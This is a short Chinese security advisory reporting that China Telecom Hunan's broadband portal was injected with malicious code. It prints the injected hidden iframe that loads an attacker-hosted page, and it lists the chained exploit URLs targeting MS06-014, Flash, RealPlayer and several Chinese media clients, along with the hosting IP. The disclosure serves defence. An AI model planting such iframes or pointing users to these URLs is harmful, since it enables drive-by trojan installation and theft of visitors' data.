中国电信湖南公司宽带家园网站被植入恶意代码
知道创宇安全团队于29日捕获中国电信湖南公司宽带家园网站被植入恶意代码,用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息.
MalUrl: hxxp://home.hn.vnet.cn
访问该页面会被365门神拦截恶意攻击:
该页面代码如下:
<iframe src=http://www.pznylsf.cn/jzll/0.htm width=50 height=0 border=0></iframe> <html><body onLoad=setTimeout(”location.href=’NetHomeWeb/welcomenethome.jsp’”,0)><font size=2 color=blue></font><meta http-equiv=’refresh’ content=’0;url=NetHomeWeb/welcomenethome.jsp’></body></html>
访问该域名会先执行顶部的IFRAME隐藏挂马,然后再通过refresh跳转至主页。
该iframe代码及其不稳定,初步估计是IDC机房内部被ARP攻击,强制在页面代码顶部加上恶意代码。
mass iframe:hxxp://www.pznylsf.cn/jzll/0.htm
[wide]http://www.pznylsf.cn/jzll/0.htm
[frame]http://zlwrnm11.cn/a277/fxx.htm
[frame]http://zlwrnm11.cn/a277/fx.htm
[frame]http://zlwrnm11.cn/a277/ss.html
[frame]http://zlwrnm11.cn/a277/Ms06014.htm
[frame]http://zlwrnm11.cn/sina.htm
[frame]http://zlwrnm11.cn/UU.htm
[frame]http://zlwrnm11.cn/a277/Thunder.html
[frame]http://zlwrnm11.cn/a277/GLWORLD.html
[frame]http://zlwrnm11.cn/a277/real.htm
[frame]http://zlwrnm11.cn/a277/Real.html
攻击者使用了flash,snapshot,ms06-014,新浪网络电视,uusee,迅雷,联众,RealPlayer10/11的漏洞进行攻击。
该恶意页面存放于近期及其活跃的恶意代码散播网段:
www.pznylsf.cn => 59.34.216.139
·本站主数据: 广东省 湛江市 电信
·本站辅数据: 广东省湛江市电信机房 [提供:]
·参考数据一: 广东省湛江市 电信ADSL
·参考数据二: 广东省湛江市 电信